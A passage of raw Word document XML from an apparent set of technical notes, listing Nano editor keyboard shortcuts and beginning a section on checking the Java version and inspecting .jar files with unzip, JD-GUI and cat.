        </w:rPr>
        <w:t xml:space="preserve">Ctrl + C</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show the current cursor position (line and column).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cut, Copy, and Paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Shift + C: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the selected text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Shift + V: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Past the text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + K</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cut the current line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + ^</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Copy text. First, use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + 6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set a mark, then navigate to highlight text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Paste the cut/copied text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003524">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Formatting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003525">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + J</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Justifies the selected paragraph.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003526">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Turn on/off line numbering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enables "mark mode" for text selection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352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29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Miscellaneous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + G</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Opens Nano's built-in help menu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Suspends Nano (returns you to the shell; use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to resume Nano).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save and Exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003530">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Save changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003531">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1225"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Exit Nano. If changes are unsaved, you'll be prompted to save or discard them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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33">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tips</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003534">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1496"/>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Ctrl + 6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set a mark for selecting text. Move the cursor to highlight, then use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + K</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to cut or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + ^</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to copy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003535">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1496"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always save your changes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before exiting with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003536">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep this guide handy for quick reference while editing!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003537">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353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39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6ng43f23qhm" w:id="476"/>
      <w:bookmarkEnd w:id="476"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Java and .jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check Java version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="609"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">java -version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unzip </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command to unzip the .jar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003540">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you use JD-GUI, you don't have to UNZIP! You can view contents inside of .jar files directly using JD-GUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003541">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see the .class files, META-INF directory (with the MANIFEST.MF file), and any other resources included</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003542">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003543">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">META-INF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003544">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat META-INF/MANIFEST.MF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003546">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
